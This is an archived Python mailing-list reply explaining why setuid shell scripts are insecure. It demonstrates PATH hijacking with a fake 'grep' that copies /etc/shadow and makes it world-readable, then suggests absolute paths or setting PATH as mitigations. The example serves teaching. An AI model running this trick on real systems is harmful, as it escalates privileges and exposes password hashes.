Securing the Pyton Interpreter?

Steven Taschuk staschuk at telusplanet.net
Wed Jul 16 10:49:25 CEST 2003


Quoth Mel Wilson:
> seem to recall there are complications with suid on scripts
> .. though I don't recall what they are.

A simple example:  Let the file insecure_script contain
    #!/bin/sh
    grep 'f.*bar' $*
This script must not be made setuid-root.  Consider:
    $ cat >grep
    #!/bin/sh
    cp /etc/shadow . && chmod 0666 ./shadow
    ^D
    $ chmod +x ./grep
    $ export PATH=.:$PATH
    $ insecure_script

You could deal with this particular problem by using absolute path
names for everything in the script, and/or by setting $PATH in the
script itself.  But there are other holes of this type, and, since
shells are complicated beasts, it is very hard to be certain that
a script has no exploitable dependencies on matters which are
under the user's control.

-- 
Steven Taschuk                            staschuk at telusplanet.net
"Our analysis begins with two outrageous benchmarks."
  -- "Implementation strategies for continuations", Clinger et al.





More information about the Python-list mailing list